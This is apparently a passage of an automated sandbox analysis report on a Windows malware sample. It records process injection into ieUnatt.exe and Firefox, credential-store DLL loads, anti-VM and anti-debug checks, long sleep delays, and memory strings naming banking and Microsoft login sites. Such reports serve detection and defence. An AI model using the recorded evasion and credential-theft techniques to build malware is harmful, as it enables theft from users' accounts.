                Source: NFhRxwbegd.exeReversingLabs: Detection: 78%
                Source: unknownProcess created: C:\Users\user\Desktop\NFhRxwbegd.exe "C:\Users\user\Desktop\NFhRxwbegd.exe"
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess created: C:\Users\user\Desktop\NFhRxwbegd.exe "C:\Users\user\Desktop\NFhRxwbegd.exe"
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess created: C:\Users\user\Desktop\NFhRxwbegd.exe "C:\Users\user\Desktop\NFhRxwbegd.exe"Jump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: NFhRxwbegd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: NFhRxwbegd.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001467000.00000004.00000020.00020000.00000000.sdmp, NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2762247141.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gsolWhsjddFW.exe, 00000007.00000002.4082242168.000000000049E000.00000002.00000001.01000000.0000000C.sdmp, gsolWhsjddFW.exe, 00000009.00000000.2628798758.000000000049E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001467000.00000004.00000020.00020000.00000000.sdmp, NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2762247141.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2562941054.0000000004E92000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2560752916.0000000004CED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NFhRxwbegd.exe, NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2562941054.0000000004E92000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2560752916.0000000004CED000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE949F push es; iretd 0_2_06DE94A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE7B2B push es; iretd 0_2_06DE7B2C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0040D8D0 pushad ; iretd 5_2_0040D8D1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_004031B0 push eax; ret 5_2_004031B2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0040D3DE pushad ; retf 5_2_0040D3DF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00414C77 push es; iretd 5_2_00414C79
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00415DE9 push ebp; iretd 5_2_00415E4B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0040E61C push es; retf 5_2_0040E61D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00418699 push esp; iretd 5_2_0041869A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00405F99 push edi; retf 5_2_00405F9A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018A225F pushad ; ret 5_2_018A27F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018A27FA pushad ; ret 5_2_018A27F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D09AD push ecx; mov dword ptr [esp], ecx5_2_018D09B6
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018A283D push eax; iretd 5_2_018A2858
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018A1368 push eax; iretd 5_2_018A1369
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_03602B48 pushad ; iretd 7_2_03602B49
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_035FB211 push edi; retf 7_2_035FB212
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_0360D911 push esp; iretd 7_2_0360D912
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_0360B061 push ebp; iretd 7_2_0360B0C3
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_03603894 push es; retf 7_2_03603895
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_03602656 pushad ; retf 7_2_03602657
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_03609EEF push es; iretd 7_2_03609EF1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050709AD push ecx; mov dword ptr [esp], ecx8_2_050709B6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F7C02E push cs; iretd 8_2_02F7C02F
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F72970 pushfd ; retn F197h8_2_02F729E2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F72970 push eax; retf DEECh8_2_02F72A30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F80C93 push ebp; iretd 8_2_02F80C9A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F72C36 push ebp; iretd 8_2_02F72C98
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F62DE6 push edi; retf 8_2_02F62DE7
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F80D69 pushad ; iretd 8_2_02F80D6A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F81683 push esi; iretd 8_2_02F81684
                Source: NFhRxwbegd.exeStatic PE information: section name: .text entropy: 7.7118543054042075
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: NFhRxwbegd.exe PID: 2488, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: 74E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: 84E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: 8690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: 9690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: A120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: B120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: C120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191096E rdtsc 5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe TID: 3132Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 6288Thread sleep count: 40 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 6288Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe TID: 5964Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe TID: 5964Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F7CC50 FindFirstFileW,FindNextFileW,FindClose,8_2_02F7CC50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: ieUnatt.exe, 00000008.00000002.4082613666.000000000341A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%)
                Source: 086604I_P.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 086604I_P.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 086604I_P.8.drBinary or memory string: discord.comVMware20,11696487552f
                Source: ieUnatt.exe, 00000008.00000002.4089511698.0000000008588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.comVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: ieUnatt.exe, 00000008.00000002.4089511698.0000000008588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169648
                Source: 086604I_P.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 086604I_P.8.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: ieUnatt.exe, 00000008.00000002.4089511698.0000000008588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,116
                Source: 086604I_P.8.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: gsolWhsjddFW.exe, 00000009.00000002.4084258036.000000000107F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2867343094.0000016B5168C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 086604I_P.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 086604I_P.8.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 086604I_P.8.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: ieUnatt.exe, 00000008.00000002.4089511698.0000000008588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552}
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 086604I_P.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 086604I_P.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 086604I_P.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 086604I_P.8.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 086604I_P.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 086604I_P.8.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 086604I_P.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 086604I_P.8.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 086604I_P.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 086604I_P.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191096E rdtsc 5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00417D83 LdrLoadDll,5_2_00417D83
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195019F mov eax, dword ptr fs:[00000030h]5_2_0195019F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195019F mov eax, dword ptr fs:[00000030h]5_2_0195019F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195019F mov eax, dword ptr fs:[00000030h]5_2_0195019F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195019F mov eax, dword ptr fs:[00000030h]5_2_0195019F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198C188 mov eax, dword ptr fs:[00000030h]5_2_0198C188
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198C188 mov eax, dword ptr fs:[00000030h]5_2_0198C188
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01910185 mov eax, dword ptr fs:[00000030h]5_2_01910185
